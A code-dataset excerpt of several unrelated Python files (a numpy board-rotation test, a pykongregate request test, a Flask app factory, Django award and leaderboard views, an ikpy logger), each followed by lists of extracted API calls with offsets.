"tkinter.Tk"
] |
[((2331, 2338), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (2336, 2338), True, 'import tkinter as tk\n'), ((2558, 2599), 'tkinter.Canvas', 'tk.Canvas', (['_mb_win'], {'width': '(200)', 'height': '(200)'}), '(_mb_win, width=200, height=200)\n', (2567, 2599), True, 'import tkinter as tk\n')]
|
import numpy as np
def test_rotation():
board_size = 3
states = np.array([[[[1, 2, 0],
[2, 1, 0],
[0, 1, 2]]],
[[[0, 3, 4],
[0, 0, 0],
[2, 1, 0]]]])
visit_counts = np.array([[0, 0, 3,
0, 0, 2,
1, 0, 0],
[5, 0, 0,
6, 7, 8,
0, 0, 9]])
new_states = []
new_visit_counts = []
for state, visit_count in zip(states, visit_counts):
for i in range(4):
rotated_state = np.rot90(state, i, axes=(1, 2))
rotated_visit_count = np.rot90(visit_count.reshape(board_size, board_size), i, axes=(0, 1))
new_states.append(rotated_state)
new_visit_counts.append(rotated_visit_count)
new_states.append(np.flip(rotated_state, 2))
new_visit_counts.append(np.fliplr(rotated_visit_count))
for i, (state, visit_count) in enumerate(zip(new_states, new_visit_counts)):
print("case: ", i)
for i in range(3):
for j in range(3):
print(state[0][i][j], end=' ')
print('')
print('')
for i in range(3):
for j in range(3):
print(visit_count[i][j], end=' ')
print('')
print('')
if __name__ == "__main__":
test_rotation()
|
[
"numpy.fliplr",
"numpy.rot90",
"numpy.array",
"numpy.flip"
] |
[((74, 163), 'numpy.array', 'np.array', (['[[[[1, 2, 0], [2, 1, 0], [0, 1, 2]]], [[[0, 3, 4], [0, 0, 0], [2, 1, 0]]]]'], {}), '([[[[1, 2, 0], [2, 1, 0], [0, 1, 2]]], [[[0, 3, 4], [0, 0, 0], [2, \n 1, 0]]]])\n', (82, 163), True, 'import numpy as np\n'), ((301, 369), 'numpy.array', 'np.array', (['[[0, 0, 3, 0, 0, 2, 1, 0, 0], [5, 0, 0, 6, 7, 8, 0, 0, 9]]'], {}), '([[0, 0, 3, 0, 0, 2, 1, 0, 0], [5, 0, 0, 6, 7, 8, 0, 0, 9]])\n', (309, 369), True, 'import numpy as np\n'), ((679, 710), 'numpy.rot90', 'np.rot90', (['state', 'i'], {'axes': '(1, 2)'}), '(state, i, axes=(1, 2))\n', (687, 710), True, 'import numpy as np\n'), ((948, 973), 'numpy.flip', 'np.flip', (['rotated_state', '(2)'], {}), '(rotated_state, 2)\n', (955, 973), True, 'import numpy as np\n'), ((1011, 1041), 'numpy.fliplr', 'np.fliplr', (['rotated_visit_count'], {}), '(rotated_visit_count)\n', (1020, 1041), True, 'import numpy as np\n')]
|
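The rotation test above enumerates the eight dihedral symmetries of the board (four rotations, each optionally mirrored) and applies the same transform to state and visit counts so they stay aligned. A compact sketch that asserts the alignment instead of printing it; the transform helper and the *10 pairing are illustrative:

import numpy as np

def dihedral_transforms(plane):
    # Yield all 8 symmetries of a 2-D array: 4 rotations, each plus a flip.
    for k in range(4):
        rotated = np.rot90(plane, k)
        yield rotated
        yield np.fliplr(rotated)

board = np.arange(9).reshape(3, 3)
visits = board * 10  # visit counts paired cell-for-cell with the board

# Every symmetry is a pure position permutation, so the pairing survives it.
for b, v in zip(dihedral_transforms(board), dihedral_transforms(visits)):
    assert np.array_equal(v, b * 10)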
from unittest import TestCase
from mock import patch
from pykongregate.api import _handle_request
from pykongregate.exceptions import NullResponseException
class TestApi(TestCase):
def test_base_request(self):
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = ''
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
self.assertRaises(
NullResponseException,
_handle_request,
url, {},
)
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = '{"hello_world": "hello_world"}'
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
params = {}
response = _handle_request(url, params)
self.assertEqual(
response, {"hello_world": "hello_world"}
)
|
[
"pykongregate.api._handle_request",
"mock.patch"
] |
[((232, 253), 'mock.patch', 'patch', (['"""requests.get"""'], {}), "('requests.get')\n", (237, 253), False, 'from mock import patch\n'), ((610, 631), 'mock.patch', 'patch', (['"""requests.get"""'], {}), "('requests.get')\n", (615, 631), False, 'from mock import patch\n'), ((910, 938), 'pykongregate.api._handle_request', '_handle_request', (['url', 'params'], {}), '(url, params)\n', (925, 938), False, 'from pykongregate.api import _handle_request\n')]
|
import logging
import sys
from flask import Flask, send_from_directory, jsonify
from flask_jwt_extended import JWTManager
from api.utils.database import db
from api.utils.responses import response_with
import api.utils.responses as resp
from api.utils.email import mail
from api.routes.authors import author_routes
from api.routes.books import book_routes
from api.routes.users import user_routes
from flask_swagger import swagger
from flask_swagger_ui import get_swaggerui_blueprint
def create_app(config):
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(author_routes, url_prefix='/api/authors')
app.register_blueprint(book_routes, url_prefix='/api/books')
app.register_blueprint(user_routes, url_prefix='/api/users')
SWAGGER_URL = '/api/docs'
swaggerui_blueprint = get_swaggerui_blueprint('/api/docs', '/api/spec',
config={
'app_name': "Flask Author DB"})
app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
@app.route('/avatar/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
@app.after_request
def add_header(response):
return response
@app.errorhandler(400)
def bad_request(e):
logging.error(e)
return response_with(resp.BAD_REQUEST_400)
@app.errorhandler(500)
def server_error(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_500)
@app.errorhandler(404)
def not_found(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_404)
@app.route('/api/spec')
def spec():
swag = swagger(app, prefix='/api')
swag['info']['base'] = "http://localhost:5000"
swag['info']['version'] = "1.0"
swag['info']['title'] = "Flask Author DB"
return jsonify(swag)
jwt = JWTManager(app)
mail.init_app(app)
db.init_app(app)
with app.app_context():
db.create_all()
logging.basicConfig(stream=sys.stdout,
format='%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s',
level=logging.DEBUG)
return app
if __name__ == '__main__':
import os
from api.config.config import ProductionConfig, TestingConfig, \
DevelopmentConfig
if os.environ.get('WORK_ENV') == 'PROD':
app_config = ProductionConfig
elif os.environ.get('WORK_ENV') == 'TEST':
app_config = TestingConfig
else:
app_config = DevelopmentConfig
app = create_app(app_config)
app.run(port=5000, host='0.0.0.0', use_reloader=True)
|
[
"api.utils.database.db.init_app",
"flask_jwt_extended.JWTManager",
"logging.error",
"logging.basicConfig",
"flask.Flask",
"api.utils.responses.response_with",
"api.utils.database.db.create_all",
"os.environ.get",
"flask.jsonify",
"api.utils.email.mail.init_app",
"flask_swagger.swagger",
"flask.send_from_directory",
"flask_swagger_ui.get_swaggerui_blueprint"
] |
[((523, 538), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (528, 538), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((831, 924), 'flask_swagger_ui.get_swaggerui_blueprint', 'get_swaggerui_blueprint', (['"""/api/docs"""', '"""/api/spec"""'], {'config': "{'app_name': 'Flask Author DB'}"}), "('/api/docs', '/api/spec', config={'app_name':\n 'Flask Author DB'})\n", (854, 924), False, 'from flask_swagger_ui import get_swaggerui_blueprint\n'), ((1979, 1994), 'flask_jwt_extended.JWTManager', 'JWTManager', (['app'], {}), '(app)\n', (1989, 1994), False, 'from flask_jwt_extended import JWTManager\n'), ((1999, 2017), 'api.utils.email.mail.init_app', 'mail.init_app', (['app'], {}), '(app)\n', (2012, 2017), False, 'from api.utils.email import mail\n'), ((2023, 2039), 'api.utils.database.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (2034, 2039), False, 'from api.utils.database import db\n'), ((2097, 2238), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'format': '"""%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s"""', 'level': 'logging.DEBUG'}), "(stream=sys.stdout, format=\n '%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s', level=\n logging.DEBUG)\n", (2116, 2238), False, 'import logging\n'), ((1184, 1242), 'flask.send_from_directory', 'send_from_directory', (["app.config['UPLOAD_FOLDER']", 'filename'], {}), "(app.config['UPLOAD_FOLDER'], filename)\n", (1203, 1242), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((1381, 1397), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1394, 1397), False, 'import logging\n'), ((1413, 1448), 'api.utils.responses.response_with', 'response_with', (['resp.BAD_REQUEST_400'], {}), '(resp.BAD_REQUEST_400)\n', (1426, 1448), False, 'from api.utils.responses import response_with\n'), ((1510, 1526), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1523, 1526), False, 'import logging\n'), ((1542, 1578), 'api.utils.responses.response_with', 'response_with', (['resp.SERVER_ERROR_500'], {}), '(resp.SERVER_ERROR_500)\n', (1555, 1578), False, 'from api.utils.responses import response_with\n'), ((1637, 1653), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1650, 1653), False, 'import logging\n'), ((1669, 1705), 'api.utils.responses.response_with', 'response_with', (['resp.SERVER_ERROR_404'], {}), '(resp.SERVER_ERROR_404)\n', (1682, 1705), False, 'from api.utils.responses import response_with\n'), ((1766, 1793), 'flask_swagger.swagger', 'swagger', (['app'], {'prefix': '"""/api"""'}), "(app, prefix='/api')\n", (1773, 1793), False, 'from flask_swagger import swagger\n'), ((1954, 1967), 'flask.jsonify', 'jsonify', (['swag'], {}), '(swag)\n', (1961, 1967), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((2076, 2091), 'api.utils.database.db.create_all', 'db.create_all', ([], {}), '()\n', (2089, 2091), False, 'from api.utils.database import db\n'), ((2439, 2465), 'os.environ.get', 'os.environ.get', (['"""WORK_ENV"""'], {}), "('WORK_ENV')\n", (2453, 2465), False, 'import os\n'), ((2524, 2550), 'os.environ.get', 'os.environ.get', (['"""WORK_ENV"""'], {}), "('WORK_ENV')\n", (2538, 2550), False, 'import os\n')]
|
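The factory above wires blueprints, error handlers, JWT, mail, Swagger, and the database into a single create_app call so each environment can pass its own config object. A stripped-down sketch of the same application-factory pattern; the greet blueprint and its route are placeholders, not the app's real endpoints:

from flask import Flask, Blueprint, jsonify

greet = Blueprint('greet', __name__)

@greet.route('/hello')
def hello():
    return jsonify(message='hello')

def create_app(config_object=None):
    app = Flask(__name__)
    if config_object is not None:
        app.config.from_object(config_object)
    app.register_blueprint(greet, url_prefix='/api')

    @app.errorhandler(404)
    def not_found(e):
        return jsonify(error='not found'), 404

    return app

if __name__ == '__main__':
    create_app().run(port=5000)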
from django.http import Http404
from django.shortcuts import render, redirect
from users.models import Profile, Team
from .forms import MultiBadgeForm
from django.contrib.auth.decorators import login_required
from .models import Points
from webpages.models import Banner, Visibility
from webpages.utils import return_camp_id
@login_required
def give_award(request):
if request.user.is_superuser:
if request.method == 'GET':
form = MultiBadgeForm()
return render(request, 'award/give_award.html', context={'form': form})
else:
form = MultiBadgeForm(request.POST)
if form.is_valid():
users = form.cleaned_data.get('users')
teams = form.cleaned_data.get('teams')
heading = form.cleaned_data.get('heading')
pr_type = form.cleaned_data.get('type')
points = form.cleaned_data.get('points')
show = form.cleaned_data.get('show')
if len(users) != 0:
for user in users:
Points.objects.create(user=user, heading=heading, type=pr_type, points=points, show=show)
elif teams:
Points.objects.create(team=teams, heading=heading, type=pr_type, points=points, show=show)
return redirect('give_award')
else:
raise Http404()
# display the list of points given including only top 3
def award_list(request, camp):
camp_id = return_camp_id(camp)
awards = Points.objects.filter(show=True, camp=camp_id)
users = awards.filter(team=None)
teams = awards.filter(user=None)
display = Visibility.objects.filter(camp=camp_id).first().awards
image = Banner.objects.filter(camp=camp_id).first().awards
context = {
"teams": teams,
'users': users,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} AWARD LIST'
}
return render(request, 'award/award_list.html', context=context)
# show the leaderboard of teams and profiles use points in corresponding models to order
def leaderboard(request, camp):
camp_id = return_camp_id(camp)
team_profiles = ""
team_points = ""
profiles = Profile.objects.filter(camps=camp_id).order_by('-points')[:10]
teams = Team.objects.filter(camp=camp_id).order_by("-team_points")[:10]
if request.user.profile.team:
team_profiles = Profile.objects.filter(team=request.user.profile.team).order_by('-points')
team_points = Team.objects.get(id=request.user.profile.team.id)
display = Visibility.objects.filter(camp=camp_id).first().leaderboard
image = Banner.objects.filter(camp=camp_id).first().leaderboard
context = {
'profiles': profiles,
'teams': teams,
'team_profiles': team_profiles,
'team_details': team_points,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} LEADERBOARD'
}
return render(request, 'award/leaderboard.html', context=context)
|
[
"users.models.Team.objects.get",
"webpages.models.Banner.objects.filter",
"webpages.models.Visibility.objects.filter",
"django.shortcuts.redirect",
"webpages.utils.return_camp_id",
"users.models.Team.objects.filter",
"django.http.Http404",
"users.models.Profile.objects.filter",
"django.shortcuts.render"
] |
[((1500, 1520), 'webpages.utils.return_camp_id', 'return_camp_id', (['camp'], {}), '(camp)\n', (1514, 1520), False, 'from webpages.utils import return_camp_id\n'), ((1997, 2054), 'django.shortcuts.render', 'render', (['request', '"""award/award_list.html"""'], {'context': 'context'}), "(request, 'award/award_list.html', context=context)\n", (2003, 2054), False, 'from django.shortcuts import render, redirect\n'), ((2192, 2212), 'webpages.utils.return_camp_id', 'return_camp_id', (['camp'], {}), '(camp)\n', (2206, 2212), False, 'from webpages.utils import return_camp_id\n'), ((3053, 3111), 'django.shortcuts.render', 'render', (['request', '"""award/leaderboard.html"""'], {'context': 'context'}), "(request, 'award/leaderboard.html', context=context)\n", (3059, 3111), False, 'from django.shortcuts import render, redirect\n'), ((1387, 1396), 'django.http.Http404', 'Http404', ([], {}), '()\n', (1394, 1396), False, 'from django.http import Http404\n'), ((2566, 2615), 'users.models.Team.objects.get', 'Team.objects.get', ([], {'id': 'request.user.profile.team.id'}), '(id=request.user.profile.team.id)\n', (2582, 2615), False, 'from users.models import Profile, Team\n'), ((495, 559), 'django.shortcuts.render', 'render', (['request', '"""award/give_award.html"""'], {'context': "{'form': form}"}), "(request, 'award/give_award.html', context={'form': form})\n", (501, 559), False, 'from django.shortcuts import render, redirect\n'), ((1340, 1362), 'django.shortcuts.redirect', 'redirect', (['"""give_award"""'], {}), "('give_award')\n", (1348, 1362), False, 'from django.shortcuts import render, redirect\n'), ((1669, 1708), 'webpages.models.Visibility.objects.filter', 'Visibility.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (1694, 1708), False, 'from webpages.models import Banner, Visibility\n'), ((1736, 1771), 'webpages.models.Banner.objects.filter', 'Banner.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (1757, 1771), False, 'from webpages.models import Banner, Visibility\n'), ((2272, 2309), 'users.models.Profile.objects.filter', 'Profile.objects.filter', ([], {'camps': 'camp_id'}), '(camps=camp_id)\n', (2294, 2309), False, 'from users.models import Profile, Team\n'), ((2347, 2380), 'users.models.Team.objects.filter', 'Team.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2366, 2380), False, 'from users.models import Profile, Team\n'), ((2469, 2523), 'users.models.Profile.objects.filter', 'Profile.objects.filter', ([], {'team': 'request.user.profile.team'}), '(team=request.user.profile.team)\n', (2491, 2523), False, 'from users.models import Profile, Team\n'), ((2631, 2670), 'webpages.models.Visibility.objects.filter', 'Visibility.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2656, 2670), False, 'from webpages.models import Banner, Visibility\n'), ((2703, 2738), 'webpages.models.Banner.objects.filter', 'Banner.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2724, 2738), False, 'from webpages.models import Banner, Visibility\n')]
|
# coding= utf8
import logging
logger = logging.getLogger("ikpy")
stream_handler = logging.StreamHandler()
logger.setLevel(logging.WARNING)
logger.addHandler(stream_handler)
def set_log_level(level):
logger.setLevel(level)
|
[
"logging.StreamHandler",
"logging.getLogger"
] |
[((40, 65), 'logging.getLogger', 'logging.getLogger', (['"""ikpy"""'], {}), "('ikpy')\n", (57, 65), False, 'import logging\n'), ((83, 106), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (104, 106), False, 'import logging\n')]
|
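The final record configures a module-level logger once at import time and exposes set_log_level for consumers. Typical usage would look like the sketch below; the ikpy.logs import path is an assumption based on the module shown:

import logging
from ikpy import logs  # assumed location of the module above

logs.set_log_level(logging.DEBUG)  # raise verbosity from the WARNING default
logs.logger.debug("now visible on stderr")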